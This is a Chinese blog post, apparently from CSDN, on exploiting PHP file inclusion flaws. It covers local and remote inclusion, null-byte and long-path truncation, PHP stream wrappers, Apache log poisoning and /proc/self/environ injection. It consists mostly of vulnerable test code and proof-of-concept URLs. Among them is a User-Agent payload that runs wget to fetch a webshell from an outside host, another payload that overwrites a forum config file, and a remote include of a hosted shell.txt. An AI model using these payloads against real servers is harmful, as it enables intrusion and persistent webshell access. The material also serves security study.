文件包含漏洞的利用

最新推荐文章于 2024-06-20 20:30:56 发布
最新推荐文章于 2024-06-20 20:30:56 发布
阅读量8.6k 收藏 5
点赞数 1
分类专栏: Web漏洞分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyi_lin/article/details/9837257
版权

本地包含

普通本地包含

只要网站支持上传,上传任意后缀文件,只要其中包含一句话,包含即可执行。

测试代码

 <?php  include_once($_GET['f']); ?>

POC

http://127.0.0.1/test/123.php?f=test.txt

截断本地包含

截断方法

因为服务器代码规定了后缀,所以不能为所欲为的包含文件。
%00截断
在Magic_quote_gpc为off的情况下才可以使用
利用方法就是这样 
http://127.0.0.1/test/123.php?f=test.txt%00
长文件名截断
因为windows和linux的文件名长度是有限制的,超过其长度的会被忽略
通常情况下windows的截断长度为260,linux的长度为4096,这一不用在意具体长度,只要把需要截断的字符串挤到后面就可以了
windows在文件名后加/.  或 \.都是可以的
测试用的代码 
<?php
	// 1. 初始化
	$ch = curl_init();
	// 2. 设置选项,包括URL
	
	$a='';
	for($i=0;$i<126;$i++){
		$a .= '/.';
	}	
	$url="http://127.0.0.1/test/123.php?f=test.txt".$a;
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
	curl_setopt($ch, CURLOPT_HEADER, 0);
	curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/4");
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION,true);
	// 3. 执行并获取HTML文档内容
	$output = curl_exec($ch);
	// 4. 释放curl句柄
	curl_close($ch);
?>

测试代码

 <?php  include_once($_GET['f'].".php"); ?>

POC

http://127.0.0.1/test/123.php?f=test.txt/././.很多很多次.````````````````

远程包含

必须是allow_url_include=On的时候才能使用,不过他在默认情况下是关闭的。

普通远程包含

用法和本地包含一样,只需要把本地路径换成url即可 
http://127.0.0.1/test/123.php?f=http://127.0.0.1/test/test.txt

截断远程包含

截断方法

问号截断法
url的话就可以随意发挥了,把不想要的扔到参数里面就好了,非常简单 
http://127.0.0.1/test/123.php?f=http://127.0.0.1/test/test.txt?id=
或者直接 
http://127.0.0.1/test/123.php?f=http://127.0.0.1/test/test.txt?

POC

这几个POC大多都与PHP的wrapper有关,详情可以看这里 
http://www.php.net/manual/en/wrappers.php.php

涉及到allow_url_fopen 和 allow_url_include 这两个设置,后者php.ini里面没有,需要自行添加。

详细设置在这里

http://php.net/manual/zh/filesystem.configuration.php

data://  或者 php://input 可以在这allow_url_include关闭的情况下包含自定义数据,不过两种方法只在5.0以下是有效的,

之后的版本include就会报错了,比较可惜。

普通利用
?file=[http|https|ftp]://websec.wordpress.com/shell.txt
(需要 allow_url_fopen=On 和 allow_url_include=On)
php://input
这个是php的输入流,可以读到没有处理过的POST数据
这样测试时的确可以取到完整的POST数据 
$raw = file_get_contents('php://input','r');
echo $raw;
这样在allow_url_include=Off会报错了 
include_once("php://input");
 php://filter
利用主要是利用了resource和vonvert,这样可以读取到php的代码。 
@readfile("php://filter/convert.base64-encode/resource=test.txt");

这样也是可以的

@readfile("php://filter/convert.base64-encode/resource=http://127.0.0.1/test/test.txt");
include的状况和php://input类似

data URIs
情况和以上两种一样,在低版本才能发挥效果 
echo file_get_contents('data://text/plain;base64,SSBsb3ZlIFBIUAo=');
include("data://text/plain;base64,SSBsb3ZlIFBIUAo=");
 php://fd
这个在5.3.6中增加的新wrapper,据说可以绕过allow_url_include进行包含。

全局变量覆盖型包含

这个我没仔细研究啦····哈哈哈~



利用技巧

Apache错误日志上传一句话

这个技巧解决了,本地包含不能上传马的问题,还是利用熟悉的Apache错误日志。
首先在配置文件中找到Apache日志的存放目录ErrorLog ../logs/apache_error.log 
http://127.0.0.1/test/123.php?f=..\..\apache2\conf\httpd.conf
之后构造一个错误的访问,使其被记录到日志中,这里注意浏览器会自动给url里面的字符编码,这里需要用其他方式模拟提交 
http://127.0.0.1/test/<?php echo hacked ?>
最后包含日志文件,之前写入的php代码就会被执行

有的时候日志文件太大导致页面无相应,可以写入这一句,实际写入时不要忘记加转义符 
<?$fp=fopen("/homeirtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?php echo hacked ?>");fclose($fp);?>
之后包含日志文件,一句话就被写到了/www/shell.php这个目录


Linux环境变量包含一句话

原理是包含/proc/self/environ,这里会有用户访问web的session信息,其中也会包含user-agent的参数,
这个参数你浏览器名称的参数。而这个参数在我们客户端是可以修改的,
所以说想个办法修改user-agen,比如修改成 
<?system('wget http://81sec.com/shell.txt -O shell.php');?>
然后提交一个,包含/proc/self/environ的请求就可以了。

session文件包含一句话

这个没有仔细研究,详情看这里 
http://www.myhack58.com/Article/html/3/62/2011/32008_2.htm
http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
这个很厉害回头研究 
http://zone.wooyun.org/content/2196?1176






wangyi_lin
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
服务端请求伪造SSRF---curl_exec()
Ethan024的博客
04-18 1802
服务端请求伪造SSRF: 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,进而导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。 攻击者----->服务器(跳板)---->目标地址 PHP中可能导致SSRF漏洞的危险函数: (1)file_get_contents(); 支持多种协议,包括http,https等。并且可以从本地和远端服务器获取资源 (2)fsockopen(); (3)curl_exec()
文件包含漏洞及绕过方法(以php为例)
热门推荐
HMX404的博客
09-27 1万+
一,文件包含漏洞的由来 简单的来说,为了减少“重复造轮子”引入了文件包含函数,可以直接使用文件中的文件和代码。当通过动态获文件时,或者需要引用网络上其他文件时,用户通过对变量值的修改访问规定的文件,但是未对变量值进行校验,导致有了可乘之机,一般在php中常见。 <?php $file = $_GET('file'); include($file); #除此之外还有Include_once;require;require_once;highlight_file; #show_source;readfil
CTF中文件包含漏洞总结
qq_64395221的博客
06-20 1137
通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。
Bugku WEB file_get_contents
qq_41696858的博客
07-17 1202
file_get_contents绕过: 解法1:?ac=bugku&fn=flag.txt 由于flag.txt里面内容就是bugku,当然可以绕过,当然,这属于投机取巧,不具有一般性 解法2:?ac=bugku&fn=php://input 在burp抓到数据包里的数据部分写上bugku,利用php://input伪协议进行绕过 解法3:?ac=bugku&fn=data://text/plain,bugku 利用data://text/plain伪协议进行绕过 data伪协议只
文件包含漏洞03】文件包含漏洞的空字符绕过及六种利用方式
Fighting_hawk的博客
03-11 5130
1. 关于图片马的几种执行方式总结: (1)利用中间件解析漏洞,不同中间件不同版本的利用方式往往不同。 (2)利用.htaccess修改Apache局部配置。 (3) 利用文件包含执行漏洞。 2. 了解PHP魔术引号的作用。 3. 掌握文件包含漏洞空字符绕过的方法。 4. 掌握文件包含漏洞的六种利用方式。...
关于php:当file_get_contents失败时如何跳过代码?
mlle_123的博客
10-09 429
关于php:当file_get_contents失败时如何跳过代码?
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件包含漏洞两种。 文件包含漏洞的攻击步骤: 1. 准备...
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
文件包含漏洞利用场景中,理解这些协议的工作原理尤为重要。 - **file://** - 用于访问本地文件系统中的文件。 - **http://** 或 **https://** - 当`allow_url_include`设置为`On`时,可用于远程文件包含。 - *...
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用漏洞,成功利用漏洞的远程攻击...
php 伪造本地文件包含漏洞的代码
10-28
本地文件包含漏洞允许攻击者通过修改动态包含文件的路径,来读取服务器上的任意文件。这不仅可能导致敏感信息泄露,还可能被利用来执行恶意代码或进一步控制服务器。 #### 三、漏洞原理分析 在上述示例代码中,...
APT漏洞利用利器工具
最新发布
06-27
描述中的“APT漏洞利用利器”进一步强调了这个工具在APT攻击中的关键角色,它可能包含了针对不同系统和应用的漏洞利用代码,使得攻击者能够高效地利用这些漏洞进行入侵。 标签“软件/插件”表明这个工具可能是以...
php包含截断小结.txt
07-24
php截断技术
一文详解文件包含漏洞
MachineGunJoe666
06-10 1969
file:// #访问本地文件系统http:// #访问HTTPs网址ftp:// #访问ftp URLphp:// #访问输入输出流zlib:// #压缩流data:// #数据expect:// #处理交互式的流glob:// #查找匹配的文件路径。
BugkuCTF-WEB题file_get_contents
am_03的博客
08-29 6122
知识点 empty() 函数用于检查一个变量是否为空。empty() 判断一个变量是否被认为是空的。当一个变量并不存在,或者它的值等同于 FALSE,那么它会被认为不存在。如果变量不存在的话,empty()并不会产生警告。 extract()函数从数组里将变量导入到当前的符号表。extract函数:可以进行变量覆盖。 语法:extract(array,extract_rules,prefix) 该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组里的各元素,将在当前符号表里创建对应的一个变量。第二
开发安全之:file_get_contents()漏洞利用
ZL_1618的博客
04-19 1499
攻击者可以控制 file_get_contents() 文件系统路径参数,借此访问或修改原本受保护的文件。Details当满足以下两个条件时,就会产生 path manipulation 错误:1.攻击者能够指定某一文件系统操作中所使用的路径。2. 攻击者可以通过指定特定资源来获取某种权限,而这种权限在一般情况下是不可能获得的。例如,在某一程序中,攻击者可以获得特定的权限,以重写指定的文件或是在其控制的配置环境下运行程序。在这种情况下,攻击者可以指定通过。
Web的基本漏洞--文件包含漏洞
尽欢的博客
05-31 1419
文件包含漏洞介绍
ctf任意文件包含漏洞简单讲解含php伪协议及习题
qq_59950255的博客
11-26 1882
先来看看什么是文件包含 在开发的过程中,遇到一些需要经常重复使用的代码,如果每次都重新写入,会造成很大的麻烦,所以,我们会将这些需要大量使用的重复代码写入一个文件中,在项目中通过函数引入这个文件,那么就可以做到代码的插入。 这些代码由几个函数引入 1.include()函数 include()函数,是临时加载的,在读到该函数时,才会包含里面的文件。include()在执行的时候如果: "合法代码" include('XXXX')假如include读取的文件不存在,他的上下两个"合法代码"都会执..
文件包含漏洞利用
qq_56327824的博客
04-27 3117
文件包含漏洞给是“代码注入”的一种,“代码注入”这种攻击,其原理就是注入一段用户能控制的脚本或代码,并让服务器执行 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节 省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接
文件包含漏洞】——文件包含漏洞进阶_文件包含漏洞绕过
weixin_45588247的博客
08-06 3660
文章目录一、实验目的:二、工具:三、实验环境:四、环境准备:1. 营造环境:2. 设置phpstudy环境:五、实验过程:1. 本地文件包含:1.1 %00截断绕过:1.1.1 原理:1.1.2 实验步骤:1.2 路径长度截断:1.2.1 原理:1.2.2 实验步骤:1.3 点号截断:1.3.1 原理:1.3.2 实验步骤:1.4 双写绕过:1.5 大小写混合绕过:1.6 伪协议绕过:2. 远程文件包含:2.1 问号绕过:2.2 #号绕过:2.3 `%00截断`绕过:2.4 其他绕过方式: 一、实验目的:
dvwa文件包含漏洞利用
07-28
DVWA文件包含漏洞利用是指利用DVWA(Damn Vulnerable Web Application)中存在的文件包含漏洞进行攻击。文件包含漏洞是一种常见的安全漏洞,它允许攻击者通过构造恶意请求来包含并执行服务器上的任意文件。 在DVWA...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值